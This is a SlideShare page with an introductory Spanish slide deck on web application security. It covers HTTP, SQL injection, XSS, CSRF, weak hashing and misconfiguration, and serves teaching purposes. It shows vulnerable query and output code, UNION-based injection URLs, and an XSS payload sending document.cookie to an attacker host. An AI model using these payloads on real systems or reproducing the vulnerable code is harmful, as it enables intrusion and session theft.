Seguridad de Aplicaciones
Web
Everth Juvenal Gallegos Puma
   
¿Que es un aplicacion web?
En la ingeniería de software se denomina
aplicación web a aquellas aplicaciones que los
usu...
   
Arquitectura de una AppWeb
http://areyouahuman.com/
   
HTTP● protocolo de transferencia de hipertexto.
● Ejemplo:
Cliente:
GET /index.php HTTP/1.1
Host: www.example.com
User...
   
¿A que nos enfrentamos?
   
¿Por donde empezamos?
   
¿Qué son los riesgos de
seguridad en aplicaciones?
   
Algunos Ejemplos
● SQL Injeccion: Injeccion de codigo sql en
consultas
codigo vulnerable
C#:
SqlCommand cmd = new
SqlC...
   
Java:
Statement stmt = con.createStatement();
ResultSet rset = stmt.executeQuery("SELECT
* FROM noticias WHERE id = '"...
   
● Testing
http://ejemplo.com/noticias.php|asp|jsp?id=1
and 1=1
internamente:
Select * from noticias where id=1 and 1=1...
   
● Ataque
allar el numero de columnas
http://ejemplo.com/noticias.php|asp|jsp?id=1
order by 1,2,..etc
hacer consultas
h...
   
● XSS:
ataque del lado del cliente para injectar codigo
html, javascript.
Codigo Vulnerable:
C#:
response.write(reques...
   
● Testing:
http://ejemplo.com/buscar.php|asp|jsp?
msg=<h1>Hola</h1>.
● Ataque:
http://ejemplo.com/buscar.php|asp|jsp?
...
   
● Falcificacion de peticiones:
Ataque:
<a href=”http://mipagina.com/resert.php?
user=admin&newpass=admin”>Gana
dinero ...
   
Defectuosa Configuracion de Seguridad:
Ejemplo
aspx:
Padding oracle:Exposicion de codigo
remotamente
PHP:
php en modo ...
   
● Errores de capa 8:
Usuarios descuidados
contraseñas debiles
archivos de respaldo no borrados.
   
Gracias
¿Preguntas?
Everth.gallegos@gmail.com
Upcoming SlideShare
Loading in …5
×

Seguridad 120618095150-phpapp01

163 views
102 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
163
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Seguridad 120618095150-phpapp01

  1. 1.     Seguridad de Aplicaciones Web Everth Juvenal Gallegos Puma
  2. 2.     ¿Que es un aplicacion web? En la ingeniería de software se denomina aplicación web a aquellas aplicaciones que los usuarios pueden utilizar accediendo a un servidor web a través de Internet o de una intranet mediante un navegador. En otras palabras, es una aplicación software que se codifica en un lenguaje soportado por los navegadores web en la que se confía la ejecución al navegador.
  3. 3.     Arquitectura de una AppWeb http://areyouahuman.com/
  4. 4.     HTTP● protocolo de transferencia de hipertexto. ● Ejemplo: Cliente: GET /index.php HTTP/1.1 Host: www.example.com User-Agent: nombre-cliente Cookie:phpsession=12aba789491279912 Connection: Close Servidor: HTTP/1.1 200 OK Date: Fri, 31 Dec 2011 23:59:59 GMT Content-Type: text/html Content-Length: 1221 <html> <body> <h1>Página principal de tuHost</h1>
  5. 5.     ¿A que nos enfrentamos?
  6. 6.     ¿Por donde empezamos?
  7. 7.     ¿Qué son los riesgos de seguridad en aplicaciones?
  8. 8.     Algunos Ejemplos ● SQL Injeccion: Injeccion de codigo sql en consultas codigo vulnerable C#: SqlCommand cmd = new SqlCommand("SELECT * FROM noticias WHERE id = '" +Request.QueryString(“id”) + "'", con); using( SqlDataReader rdr = cmd.ExecuteReader() );
  9. 9.     Java: Statement stmt = con.createStatement(); ResultSet rset = stmt.executeQuery("SELECT * FROM noticias WHERE id = '" + request.getParameter(“id”) + "';"); PHP: $query_result = mysql_query("SELECT * FROM noticias WHERE id = '" . $_GET[“id”]. "'");
  10. 10.     ● Testing http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=1 internamente: Select * from noticias where id=1 and 1=1 “muestra contenido” http://ejemplo.com/noticias.php|asp|jsp?id=1 and 1=2 internamente: Select * from noticias where id=1 and 1=2 “No muestra Contenido”
  11. 11.     ● Ataque allar el numero de columnas http://ejemplo.com/noticias.php|asp|jsp?id=1 order by 1,2,..etc hacer consultas http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables http://ejemplo.com/noticias.php|asp|jsp?id=1 union select 1,2,table_name,4,5,..,etc from information_schema.tables. Consula a la tabla de usuario
  12. 12.     ● XSS: ataque del lado del cliente para injectar codigo html, javascript. Codigo Vulnerable: C#: response.write(request.querystring(“msg”)); JAVA: out.println(request.getParameter(“msg”)); PHP: echo $_GET[“msg”];
  13. 13.     ● Testing: http://ejemplo.com/buscar.php|asp|jsp? msg=<h1>Hola</h1>. ● Ataque: http://ejemplo.com/buscar.php|asp|jsp? msg=document.location=http://juaker.com/xss. php?datos=document.cookie;
  14. 14.     ● Falcificacion de peticiones: Ataque: <a href=”http://mipagina.com/resert.php? user=admin&newpass=admin”>Gana dinero con un click</a>. ● Almacenamiento Criptográfico Inseguro “cifrar adecuadamente datos importantes” ejemplo passcifrado=md5(salt+passoriginal);
  15. 15.     Defectuosa Configuracion de Seguridad: Ejemplo aspx: Padding oracle:Exposicion de codigo remotamente PHP: php en modo cgi:Exposicion y ejecucion de codigo remoto
  16. 16.     ● Errores de capa 8: Usuarios descuidados contraseñas debiles archivos de respaldo no borrados.
  17. 17.     Gracias ¿Preguntas? Everth.gallegos@gmail.com

×